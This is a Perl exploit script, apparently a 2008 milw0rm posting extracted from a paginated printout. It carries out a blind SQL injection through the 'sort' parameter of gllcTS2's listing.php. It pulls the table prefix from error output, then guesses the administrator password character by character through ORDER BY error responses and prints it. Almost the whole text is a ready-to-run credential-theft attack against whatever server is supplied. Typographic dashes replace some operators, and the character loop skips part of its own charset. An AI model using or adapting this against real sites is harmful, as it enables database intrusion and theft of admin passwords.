      1   #!/usr/bin/perl
      2   ######################
      3   #
      4   #gllcTS2 (listing.php $sort) Remote Blind SQL Injection Exploit
      5   #
      6   ######################
      7   #
      8   #Bug by: h0yt3r
      9   #
  10      ##
  11      ###
  12      ##
  13      #
  14      #This one shows another vulnerability in gllcTS2. (There are many more, most of them simple injections.)
  15      #Same Versions are affected.
  16      #It also shows the concept of injecting into an ORDER BY clause via blind injection,
  17      #WITHOUT benchmark(): instead of timing, the query is made to raise an error when the IF() condition is TRUE.
  18      #
  19      #Gr33tz go to:
  20      #b!zZ!t, ramon, thund3r, Free-Hack, Sys-Flaw and of course the neverdying h4ck-y0u Team
  21      #
  22      ################
  23      use LWP::UserAgent;
  24      my $userAgent = LWP::UserAgent−>new;
  25
  26      usage();
  27
  28      $server = $ARGV[0];
  29      $dir = $ARGV[1];
  30
  31
  32      print"\n";
  33      if (!$dir) { die "Read Usage!\n"; }
  34
  35
  36      $filename ="listing.php";
  37
  38      my $vulnCheck = "http://".$server.$dir.$filename;
  39
  40      my $prefix ="";
  41
  42      my @Daten = ("61","62","63","64","65","66","67","68","69","6A","6B","6C","6D","6E","6F","70","71","72","73","74","75","76"
          ,"77","78","79","7A","3A","5F","31","32","33","34","35","36","37","38","39","30");
  43
  44      my $Attack= $userAgent−>get($vulnCheck);
  45      if ($Attack−>is_success)
  46      {
  47           print "[x]Attacking ".$vulnCheck."\n";
  48      }
  49      else
  50      {
  51           print "Couldn’t connect to ".$vulnCheck."!";
n/a                                                                                                                        06/13/2008
                            GLLCTS2 listing.php sort Remote Blind SQL Injection Exploit                                                   Page 2/3
  52         exit;
  53    }
  54
  55    print "[x]Vulnerable Check:";
  56
  57    my $check = $vulnCheck."?sort=’";
  58
  59    my $Attack= $userAgent−>get($check);
  60    if($Attack−>content =~ m/FROM (.*?)_weblist/i)
  61    {
  62         print " Vulnerable!\n";
  63         $prefix = $1;
  64    }
  65    else
  66    {
  67         print " Not Vulnerable!";
  68         exit;
  69    }
  70
  71    my $hex="";
  72    my $length;
  73
  74    print "[x]Bruteforcing Length\n";
  75
  76    my $lengthCounter = 1;
  77    while(1)
  78    {
  79          #To inject ORDER BY (where we cannot union select) we just have to pass a simple IF statement.
  80          #Instead of Benchmark() we can use a subquery which, in this case, would return "Subquery returns more than 1 row
        " if the statement actualle is true.
  81          my $url = "".$vulnCheck."?sort=IF(LENGTH((select admin_pass from ".$prefix."_admin))=".$lengthCounter.",(select 1 union select 5),null)&
        direction=desc&showgroup=all";
  82          my $Attack= $userAgent−>get($url);
  83          my $content = $Attack−>content;
  84          if($content =~ m/Please contact a the site admin immediately./i)
  85          {
  86               $length=$lengthCounter;
  87               last;
  88          }
  89          else
  90          {
  91               $lengthCounter++;
  92          }
  93    }
  94
  95
  96    print "[x]Injecting Black Magic\n";
  97
  98    for($b=1;$b<=$length;$b++)
  99    {
  100       for(my $u=0;$u<28;$u++)
  101       {
n/a                                                                                                                                        06/13/2008
                           GLLCTS2 listing.php sort Remote Blind SQL Injection Exploit                                                        Page 3/3
  102                my $url = "".$vulnCheck."?sort=IF(substring((select admin_pass from ".$prefix."_admin),".$b.",1)=0x".$Daten[$u].",(select 1 union sel
        ect 5),null)&direction=desc&showgroup=all";
  103
  104             my $Attack= $userAgent−>get($url);
  105
  106             my $content = $Attack−>content;
  107
  108             if($content =~ m/Please contact a the site admin immediately./i)
  109             {
  110                 print "[x] Found Char ".$Daten[$u]."\n";
  111                 $hex=$hex.$Daten[$u];
  112                 last;
  113             }
  114
  115             else
  116             {
  117                  #Whatever...
  118             }
  119        }
  120   }
  121
  122   print "[x]Converting \n";
  123   my $a_str = hex_to_ascii($hex);
  124
  125   print "[x]Success! \n";
  126   print " Adminpassword: $a_str\n";
  127
  128   sub hex_to_ascii ($)
  129   {
  130           (my $str = shift) =~ s/([a−fA−F0−9]{2})/chr(hex $1)/eg;
  131           return $str;
  132   }
  133
  134   sub usage()
  135   {
  136       print q
  137       {
  138       ######################################################
  139                 gllcTS2 Remote Blind SQL Injection Exploit
  140                            −Written by h0yt3r−
  141       Usage: gllcts2.pl [Server] [Path]
  142       Sample:
  143       perl gllcts2.pl www.site.com /cms/
  144       ######################################################
  145       };
  146
  147   }
  148
  149   # milw0rm.com [2008-06-13]




				